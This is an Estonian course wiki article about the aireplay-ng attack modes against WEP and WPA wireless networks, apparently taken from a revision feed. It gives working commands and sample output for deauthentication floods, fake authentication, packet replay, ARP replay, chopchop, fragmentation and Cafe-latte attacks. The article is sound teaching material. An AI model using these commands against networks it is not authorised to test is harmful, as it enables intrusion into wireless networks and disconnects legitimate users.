      Source MAC  =  BB:BB:BB:BB:BB:BB&lt;br /&gt;
&lt;br /&gt;
      0x0000:  0842 0201 000f b5ab cb9d 0014 6c7e 4080  .B..........l~@.&lt;br /&gt;
      0x0010:  00d0 cf03 348c e0d2 4001 0000 2b62 7a01  ....4...@...+bz.&lt;br /&gt;
      0x0020:  6d6d b1e0 92a8 039b ca6f cecb 5364 6e16  mm.......o..Sdn.&lt;br /&gt;
      0x0030:  a21d 2a70 49cf eef8 f9b9 279c 9020 30c4  ..*pI.....&#039;.. 0.&lt;br /&gt;
      0x0040:  7013 f7f3 5953 1234 5727 146c eeaa a594  p...YS.4W&#039;.l....&lt;br /&gt;
      0x0050:  fd55 66a2 030f 472d 2682 3957 8429 9ca5  .Uf...G-&amp;amp;.9W.)..&lt;br /&gt;
      0x0060:  517f 1544 bd82 ad77 fe9a cd99 a43c 52a1  Q.D...w.....&amp;lt;R.&lt;br /&gt;
      0x0070:  0505 933f af2f 740e                      ...?./t.&lt;br /&gt;
&lt;br /&gt;
 Use this packet ? y&lt;br /&gt;
Saving chosen packet in replay_src-0001-123456.cap&lt;br /&gt;
 Data packet found!&lt;br /&gt;
 Sending fragmented packet&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 384 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 1500 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Saving keystream in fragment-0001-123456.xor&lt;br /&gt;
 Now you can build a packet with packetforge-ng out of that 1500 bytes keystream&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ja meil ongi olemas .xor fail millega saab &#039;&#039;custom&#039;&#039; pakette injectida. Muidugi on vajalik assotsiaseeritud klienti kelle nimelt pakette injectida.[12]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 6: Cafe-latte attack==&lt;br /&gt;
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - selle etapini jõudmiseks ei pea AP tõestama et ta WEP võtit teab.&lt;br /&gt;
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]&lt;br /&gt;
&lt;br /&gt;
See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki terviklikkuse kontroll.&lt;br /&gt;
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]&lt;br /&gt;
&lt;br /&gt;
Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC&#039;d et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]&lt;br /&gt;
&lt;br /&gt;
Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]&lt;br /&gt;
&lt;br /&gt;
===Kasutamine===&lt;br /&gt;
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama &amp;quot;-D&amp;quot; argumenti et lülitada välja AP otsimine.[14]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -6 -h CC:CC:CC:CC:CC:CC -b AA:AA:AA:AA:AA:AA -D mon0&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Rünnak 7: Client-oriented fragmentation attack==&lt;br /&gt;
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.&lt;br /&gt;
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 sihtmärgi IP ning sihtmärgi MAC peab olema nullbaidi jada.&lt;br /&gt;
Praktikas võib sihtmärgi MAC olla aga suvaline väärtus.[15]&lt;br /&gt;
&lt;br /&gt;
Saadud pakis on teada koht kus asub lähtepunkti IP aadress - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]&lt;br /&gt;
&lt;br /&gt;
===ARP===&lt;br /&gt;
Korrektse ARP päringu saatmiseks kliendile peame liigutama lähtekoha IP aadress positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks lähtekoha(kliendi) IP positsioonile 33(sihtmärk). Teine fragment on pakett mis kliendilt alguses saadi.[15]&lt;br /&gt;
&lt;br /&gt;
===IP===&lt;br /&gt;
IP paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]&lt;br /&gt;
&lt;br /&gt;
Igaljuhul kasutatakse CRC korrektsuse säilitamiseks &#039;&#039;bit flippingut&#039;&#039;. Sama meetodit kasutatakse ka ARP paketi lähtekoha MAC&#039;i muutmiseks juhul kui seal on algselt &#039;&#039;multicast&#039;&#039;.[15]&lt;br /&gt;
&lt;br /&gt;
===Kasutamine===&lt;br /&gt;
&amp;lt;pre&amp;gt;$ sudo aireplay-ng -7  -h CC:CC:CC:CC:CC:CC -D mon0&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Viited=&lt;br /&gt;
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng&lt;br /&gt;
&lt;br /&gt;
[2] http://www.aircrack-ng.org/doku.php?id=deauthentication&lt;br /&gt;
&lt;br /&gt;
[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication&lt;br /&gt;
&lt;br /&gt;
[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy&lt;br /&gt;
&lt;br /&gt;
[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html&lt;br /&gt;
&lt;br /&gt;
[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html&lt;br /&gt;
&lt;br /&gt;
[7] http://www.aircrack-ng.org/doku.php?id=shared_key&lt;br /&gt;
&lt;br /&gt;
[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay&lt;br /&gt;
&lt;br /&gt;
[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection&lt;br /&gt;
&lt;br /&gt;
[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop&lt;br /&gt;
&lt;br /&gt;
[11] http://www.informit.com/guides/content.aspx?g=security&amp;amp;seqNum=197&lt;br /&gt;
&lt;br /&gt;
[12] http://www.aircrack-ng.org/doku.php?id=fragmentation&lt;br /&gt;
&lt;br /&gt;
[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2&lt;br /&gt;
&lt;br /&gt;
[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte&lt;br /&gt;
&lt;br /&gt;
[15] http://www.aircrack-ng.org/doku.php?id=hirte&lt;br /&gt;
&lt;br /&gt;
[[Category:Traadita_side_alused]]&lt;/div&gt;</summary>
		<author><name>Tliiv</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=32798</id>
		<title>Aireplay-ng ründerežiimid</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=32798"/>
		<updated>2011-05-24T19:25:00Z</updated>

		<summary type="html">&lt;p&gt;Tliiv: /* Rünnak 6: Cafe-latte attack */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Autor=&lt;br /&gt;
Tanel Liiv D22 (2011)&lt;br /&gt;
&lt;br /&gt;
=Sissejuhatus=&lt;br /&gt;
&lt;br /&gt;
Aireplay-ng`d kasutatakse &#039;&#039;frame&#039;&#039;`de sisestamiseks võrguliiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA &#039;&#039;handshake&#039;&#039; pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
=Eelteadmised=&lt;br /&gt;
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad &#039;&#039;backendis&#039;&#039; töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.&lt;br /&gt;
&lt;br /&gt;
Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.&lt;br /&gt;
&lt;br /&gt;
==WEP==&lt;br /&gt;
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi&lt;br /&gt;
===Open Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimis päringu AP&#039;le.[5]&lt;br /&gt;
* AP autentib kliendi.[5]&lt;br /&gt;
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]&lt;br /&gt;
* Klient assotsiaseerub AP&#039;ga ja liitub võrguga.[5]&lt;br /&gt;
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP&#039;le pakette(nõrkus).[5]&lt;br /&gt;
&lt;br /&gt;
===Shared Key Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimise päringu AP&#039;le.[6]&lt;br /&gt;
* AP saadab kliendile &#039;&#039;random&#039;&#039; baidijada(ülesanne).[6]&lt;br /&gt;
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP&#039;le.[6]&lt;br /&gt;
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP&#039;l sama WEP võti, ning AP autentib kliendi ära.[6]&lt;br /&gt;
* Klient ühendub võrku.[6]&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP&#039;le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)&lt;br /&gt;
&lt;br /&gt;
=Meetodid=&lt;br /&gt;
Meetodite pealkrijade ees on &amp;quot;Rünnak x:&amp;quot;. x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.&lt;br /&gt;
==Rünnak 0: Deauthentication==&lt;br /&gt;
&lt;br /&gt;
See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava &#039;&#039;access pointiga&#039;&#039; assotsiaseerunud. Klientide lahtiühendamisel võib olla mitu eesmärki:[2]&lt;br /&gt;
&lt;br /&gt;
* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta &#039;&#039;broadcastis&#039;&#039;.[2]&lt;br /&gt;
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]&lt;br /&gt;
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP &#039;&#039;cache&#039;&#039; tühjendada kui ühendus ära kaob)[2]&lt;br /&gt;
&lt;br /&gt;
NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentitud klienti.[2]&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
&lt;br /&gt;
====Suunatud====&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA -c CC:CC:CC:CC:CC:CC mon0&lt;br /&gt;
21:36:02  Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel 11&lt;br /&gt;
21:36:03  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|38 ACKs]&lt;br /&gt;
21:36:03  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:04  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:04  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|50 ACKs]&lt;br /&gt;
21:36:05  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:06  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:06  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 2|54 ACKs]&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]&lt;br /&gt;
* kanal peab olema sama millel AP reaalselt räägib[2]&lt;br /&gt;
* STMAC on rünnatava kliendi korrektne MAC aadress[2]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Sending 64 directed&#039;&#039;&#039; - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP&#039;le.[2]&lt;br /&gt;
* &#039;&#039;&#039;61&#039;&#039;&#039; - mitu paketti klient kätte sai[2]&lt;br /&gt;
* &#039;&#039;&#039;63&#039;&#039;&#039; - mitu paketti AP kätte sai[2]&lt;br /&gt;
&lt;br /&gt;
Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64&#039;le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]&lt;br /&gt;
&lt;br /&gt;
Suunatud &#039;&#039;versus&#039;&#039; broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud lahtiühendamise paketti.[2]&lt;br /&gt;
&lt;br /&gt;
Kui sulle kliendi ACK&#039;ide arv tundub korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]&lt;br /&gt;
&lt;br /&gt;
====Broadcast====&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA  mon0&lt;br /&gt;
21:33:25  Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel 11&lt;br /&gt;
NB: this attack is more effective when targeting&lt;br /&gt;
a connected wireless client (-c &amp;lt;client&#039;s mac&amp;gt;).&lt;br /&gt;
21:33:25  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:26  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:26  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:27  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:27  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:28  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nagu mainitud, &#039;&#039;broadcast&#039;&#039; lahtiühendamine on vähem efektiivsem.&lt;br /&gt;
&lt;br /&gt;
==Rünnak 1: Fake authentication==&lt;br /&gt;
Võlts autentimine lubab läbi viia nii Open System kui ka Shared Key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP&#039;le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.&lt;br /&gt;
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]&lt;br /&gt;
&lt;br /&gt;
Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga. See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
====Open Authentication====&lt;br /&gt;
Open authentication puhul ei üritata klienti enne assotsiaseerumist autentida, seega saame kerge vaevaga ennast ära assotsiaseeruda ning hakata AP&#039;ga suhtlema. Selles etapis hakkavad tavakliendid WEP&#039;i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP&#039;le saatma, uuesti ja uuesti.[4]&lt;br /&gt;
&amp;lt;pre&amp;gt;$ sudo aireplay-ng -1 0 -a AA:AA:AA:AA:AA:AA -h CC:CC:CC:CC:CC:CC mon0&lt;br /&gt;
21:40:20  Sending Authentication Request&lt;br /&gt;
21:40:20  Authentication successful&lt;br /&gt;
21:40:20  Sending Association Request&lt;br /&gt;
21:40:20  Association successful :-)&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Sellisel juhul on assotsiaseerumine õnnestunud võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]&lt;br /&gt;
&lt;br /&gt;
====Shared Key Authentication====&lt;br /&gt;
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP&#039;ga assotsiaseeruda(me ei tea ju salajast võtit millega autentimisel AP saadetud puzzle ära &amp;quot;lahendada&amp;quot;) ning sellest tulenevalt ei saa me ka AP&#039;le mingeid pakke saata.&lt;br /&gt;
&amp;lt;pre&amp;gt;...&lt;br /&gt;
15:46:53  Sending Authentication Request&lt;br /&gt;
15:46:53  AP rejects open-system authentication&lt;br /&gt;
Please specify a PRGA-file (-y).&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul on vaja kinni püüda SKA &#039;&#039;handshake&#039;&#039; paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake&#039;i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]&lt;br /&gt;
&lt;br /&gt;
Kinnipüütud &#039;&#039;handshake&#039;&#039;`id salvestatakse &amp;quot;sharedkey-01-00-14-6C-7E-40-80.xor&amp;quot; formaadis faili. See fail tuleb vastavasse AP&#039;sse fake autentimisel/kliendi disconnectimisks anda kaasa &amp;quot;-y&amp;quot; käsurea argumendiga.[7]&lt;br /&gt;
&lt;br /&gt;
NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake&#039;i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 2: Interactive packet replay==&lt;br /&gt;
&lt;br /&gt;
See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.&lt;br /&gt;
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV&#039;sid.&lt;br /&gt;
Väga kasulik on panna peale ka &amp;quot;-m 68 -n 86&amp;quot; filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Naturaalsed paketid===&lt;br /&gt;
&lt;br /&gt;
Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida.  AP&#039;d edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on &amp;quot;To DS&amp;quot; lipuke seatud &amp;quot;1&amp;quot; peale.&lt;br /&gt;
Need  filtrid on seadistatavad -b,-d ja -t argumentidega.[8]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -2 -b AA:AA:AA:AA:AA:AA -d FF:FF:FF:FF:FF:FF -t 1 mon0&lt;br /&gt;
 Read 4 packets...&lt;br /&gt;
 &lt;br /&gt;
      Size: 68, FromDS: 0, ToDS: 1 (WEP)&lt;br /&gt;
 &lt;br /&gt;
           BSSID  =  AA:AA:AA:AA:AA:AA&lt;br /&gt;
       Dest. MAC  =  FF:FF:FF:FF:FF:FF&lt;br /&gt;
      Source MAC  =  CC:CC:CC:CC:CC:CC&lt;br /&gt;
 &lt;br /&gt;
      0x0000:  0841 de00 0014 6c7e 4080 000f b534 3030  .A....l~@....400&lt;br /&gt;
      0x0010:  ffff ffff ffff 4045 d16a c800 6f4f ddef  ......@E.j..oO..&lt;br /&gt;
      0x0020:  b488 ad7c 9f2a 64f6 ab04 d363 0efe 4162  ...|.*d....c..Ab&lt;br /&gt;
      0x0030:  8ad9 2f74 16bb abcf 232e 97ee 5e45 754d  ../t....#...^EuM&lt;br /&gt;
      0x0040:  23e0 883e                                #..&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Use this packet ? y&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Manipuleeritavad pakid===&lt;br /&gt;
&lt;br /&gt;
Eesmärk, nagu alati, on panna AP genereerima uusi IV&#039;sid. Ainuke vajalik argument on &amp;quot;-t 1&amp;quot; - see selekteerib ainult pakette mis liiguvad etherneti suunas.&lt;br /&gt;
&lt;br /&gt;
Me ei hooli ka mis lõppunkti MAC aadress on, kuna  me saame selle ära muuta.  Selleks on &amp;quot;-p 0841&amp;quot; argument, mis  muudab paki põhimõtte selliseks nagu ta saadetaks kliendist  AP&#039;sse - põmst. muudab &amp;quot;To DS&amp;quot; lipu &amp;quot;1&amp;quot;. Vaja on anda ka &amp;quot;-c&amp;quot; väärtuseks broadcast MAC.[8]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -2 -b AA:AA:AA:AA:AA:AA -t 1 -c FF:FF:FF:FF:FF:FF -p 0841 mon0&lt;br /&gt;
 Read 10 packets...&lt;br /&gt;
 &lt;br /&gt;
      Size: 124, FromDS: 0, ToDS: 1 (WEP)&lt;br /&gt;
 &lt;br /&gt;
           BSSID  =  AA:AA:AA:AA:AA:AA&lt;br /&gt;
       Dest. MAC  =  BB:BB:BB:BB:BB:BB&lt;br /&gt;
      Source MAC  =  CC:CC:CC:CC:CC:CC&lt;br /&gt;
 &lt;br /&gt;
      0x0000:  0841 2c00 0014 6c7e 4080 000f b534 3030  .A,...l~@....400&lt;br /&gt;
      0x0010:  0040 f477 e5c9 90c9 3d79 8b00 ce59 2bd7  .@.w....=y...Y+.&lt;br /&gt;
      0x0020:  96e7 fadf e0de 2e99 c019 4f85 9508 3bcc  ..........O...;.&lt;br /&gt;
      0x0030:  8d18 dbd5 92a7 a711 87d8 58d3 02b3 7be7  ..........X...{.&lt;br /&gt;
      0x0040:  8bf1 69c0 c596 3bd1 436a 9598 762c 9d1d  ..i...;.Cj..v,..&lt;br /&gt;
      0x0050:  7a57 3f3d e13c dad0 f2d8 0e65 6d66 d913  zW?=.&amp;lt;.....emf..&lt;br /&gt;
      0x0060:  9716 84a0 6f9a 0c68 2b20 7f55 ba9a f825  ....o..h+ U...%&lt;br /&gt;
      0x0070:  bf22 960a 5c7b 3036 290a 89d6            .&amp;quot;..\{06)...&lt;br /&gt;
 &lt;br /&gt;
 Use this packet ? y&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Klientideta võrgu ründamine===&lt;br /&gt;
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP&#039;d. Jooksuta aireplay-d kõige elementaarsemate argumentidega:&lt;br /&gt;
&amp;lt;pre&amp;gt;$ sudo aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt &amp;quot;y&amp;quot; esimesele tulevale pakile ja AP hakkab IV&#039;sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV&#039;sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 3: ARP request replay attack==&lt;br /&gt;
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV&#039;de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP&#039;le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.&lt;br /&gt;
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -3 -b AA:AA:AA:AA:AA:AA -h CC:CC:CC:CC:CC:CC mon0&lt;br /&gt;
 Saving ARP requests in replay_arp-0001-123456.cap&lt;br /&gt;
 You should also start airodump-ng to capture replies.&lt;br /&gt;
 Read 11978 packets (got 7193 ARP requests), sent 3902 packets...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Rünnak 4: KoreK chopchop attack==&lt;br /&gt;
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP&#039;d ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]&lt;br /&gt;
&lt;br /&gt;
===Teooria===&lt;br /&gt;
KoreK kasutab hästituntud nõrga ICV[link] probleemi ja järeldab sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]&lt;br /&gt;
&lt;br /&gt;
